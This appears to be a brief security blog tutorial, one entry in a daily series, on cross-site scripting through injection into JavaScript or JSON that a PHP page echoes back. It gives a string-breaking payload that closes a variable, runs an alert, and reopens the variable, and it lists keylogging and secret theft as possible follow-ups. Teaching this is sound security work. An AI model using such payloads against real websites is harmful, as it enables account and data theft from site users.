Day 33: XSS, JSON/JS Injection

So, you have found an app that echoes back your input into a json array, or some JavaScript code, but it’s not a function you can exploit. Who cares? Just write your own JavaScript.

Made a Simple Test Page

What does it do?

It takes the value of payload and then logs it to console along with the age.

Let’s look at the source…

Php injects the request parameter into the page dynamically, it then produces normal script output, this is very common in web apps, dynamically producing static code output.

What do we do next?

Well, like overflows we control what happens after, therefore all we have to do is provide valid code!

Payload…

james"; alert("Follow me on Twitter @int0x33"); var random = "

As you can see we had to finish off the first variable properly…

james";
produces..
var name = "james";

Then we can do whatever we want…

alert("Follow me on Twitter @int0x33");
  • Keylog
  • Steal Secrets
  • Browser Exploitation etc

Finally, close it off properly…

var random = "
produces...
var random = "";

Now, go forth and exploit injectable static code, JavaScript and JSON blobs! Woop woop.

I will do a few posts on advanced XSS exploitation in the coming weeks that will help you get past filters, do more with XSS and generally take XSS exploitation to the next level.